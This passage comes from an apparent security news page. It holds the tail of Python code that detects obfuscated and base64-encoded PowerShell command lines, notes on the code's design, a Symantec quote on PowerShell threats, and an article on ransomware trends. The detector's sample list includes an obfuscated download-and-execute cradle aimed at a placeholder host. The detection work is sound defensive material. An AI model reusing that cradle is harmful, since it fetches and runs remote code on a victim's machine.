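    # backtick escape characters and mixed case to defeat naive string matching
    'powershell.exe -c "i`e`x (nEw-oBjEcT nEt.wEbClIeNt)'
    ".dOwNlOaDsTrInG('http://example.invalid/b.ps1')\"",
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    for match in _SWITCH_RE.finditer(cmdline):
        switch, blob = match.group(1).lower(), match.group(2)
        if switch not in _ENCODED_SWITCHES:
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            return None
    return None


def normalize(cmdline, decoded=None):
    """Lower-case and strip backtick escapes so i`e`x reads as iex, then append
    the decoded payload so indicators inside -EncodedCommand are matched too.
    Dropping backticks also breaks legitimate escapes such as `n, which is
    acceptable for indicator matching."""
    text = cmdline.replace("`", "").lower()
    if decoded:
        text += " " + decoded.replace("`", "").lower()
    return text


def analyze(cmdline):
    """Score one command line; returns matched indicators and a verdict."""
    decoded = decode_encoded_command(cmdline)
    text = normalize(cmdline, decoded)
    hits = {name for name, (pattern, _) in _INDICATORS.items() if pattern.search(text)}
    score = sum(_INDICATORS[name][1] for name in hits)
    if decoded is not None:  # encoding itself is a (weak) signal
        hits.add("encoded_command")
        score += 2
    return {
        "command_line": cmdline,
        "decoded": decoded,
        "indicators": sorted(hits),
        "score": score,
        "suspicious": score >= SUSPICIOUS_THRESHOLD,
    }


def triage(cmdlines):
    """Return the analyses that cross the threshold, highest score first."""
    results = [analyze(c) for c in cmdlines]
    return sorted((r for r in results if r["suspicious"]),
                  key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(r["score"], r["indicators"])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Two design points: the decoder accepts every prefix of -EncodedCommand because powershell.exe does, so matching only the literal `-EncodedCommand` would miss most real cases; and the backtick-stripping is deliberately lossy, since the goal is indicator matching rather than faithful re-execution. Script block logging (event 4104) records the de-obfuscated script that actually ran and is the better source where it is enabled; the command-line check above is for the common case the article describes, where it is not.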

Symantec expects more PowerShell threats to appear in the future. “We strongly recommend system administrators to upgrade to the latest version of PowerShell and enable extended logging and monitoring capabilities,” said Wueest.


via: computerweekly

5 Sure Signs Ransomware Attacks Are Intensifying

Attackers have begun to encrypt wide swaths of business data, asking, and getting, five-figure payments for a decryption key; will IoT extortion come next?

Ransomware continues to pose a potent threat to individuals and, increasingly, to companies. What’s worse, all signs point to ransomware attacks escalating through the rest of this year and into 2017.

How bad is it? Arctic Wolf Networks has measured a 433 percent spike in ransomware attacks over the past year, and the FBI says victims paid $209 million in the first quarter of 2016, up from $24 million in all of 2015. And that counts only complaints actually registered with the bureau.

A basic attack involves enticing a victim to open a malicious attachment or click a web link that arrives in a legitimate-looking email message. If the ransomware successfully downloads and runs, it’s game over: within moments, the sensitive files on the targeted machine are encrypted. To unlock the files, the victim must purchase a decryption key from the attackers.

If you or your organization stores sensitive data, you could be targeted next. Frankly, the reason many organizations haven’t been compromised is that the bad guys haven’t gotten around to them yet. Here are five ransomware developments you’d be wise to fully grasp:

Attacks shift to companies.

Ransomware purveyors are reaping huge fortunes pillaging the business sector. These criminals are not content encrypting just the files on one PC; they are locking up wide swaths of data stored on servers deep inside company networks.

Elite criminals have begun probing long-known vulnerabilities in the open-source protocols and platforms that businesses rely on to stitch together digital systems and applications. Cisco recently disclosed how one ring has perfected a way to spread the notorious SamSam family of ransomware laterally inside company networks to multiple Microsoft Windows systems.

Iron-clad cryptography.

The latest ransomware variants use encryption that cannot practically be broken without the attackers’ key. So if your organization does not maintain readily available backups, purchasing a decryption key under duress may be the only viable option. Typically, the victim is allowed 90 hours to pay up, a deadline emphasized by a countdown clock. Left in the lurch, many companies are routinely paying five- and sometimes six-figure ransoms.

Bitcoin replaces cash.

The criminals are taking pains to route all attack-related communications through the Tor anonymization network, making it difficult for law enforcement to track them down. And they demand payment in Bitcoin, which can be easily split among ring members in a way that is hard to trace back to them.

“They’ll give you steps on how to acquire the Bitcoin,” says Travis Smith, senior security researcher at Tripwire, a supplier of compliance auditing systems. “Once you transfer your Bitcoin to the address they provide, then they’ll give you the decryption key.”

Perpetual exposure.

Most often the criminals will deliver a decryption key upon payment. But sometimes the key doesn’t work. Sometimes files get lost. There really is no way to tell if the attacker tampered with your files, or kept copies. And then there is the risk of re-infection. Cisco researchers report instances of ransomware striking the same users twice on the same machine.

What’s next?

It’s crucial to realize that what we see now are early examples of server attacks that only scratch the surface. More invasive, resilient network-level attacks are sure to come. Cisco anticipates the arrival of self-propagating ransomware that spreads without any user interaction, just as Conficker and other Windows worms proliferated nearly a decade ago. Tripwire’s Smith anticipates that it won’t be long before attackers begin experimenting with spreading ransomware through the Internet of Things.

“We could see ransomware begin to target thermostats and TVs, as far as encrypting IoT devices and preventing consumers from accessing those devices,” Smith says.

How do we deal with this today? Be vigilant and suspicious when clicking on attachments and web links. Never trust, always verify. Be obsessive about backing up important files. Train employees to be alert and patch known vulnerabilities in a timely manner, especially in open-source networking protocols. And, adjust to the fact that this will be the new normal, because ransomware is going to be with us for a while.


via:  inc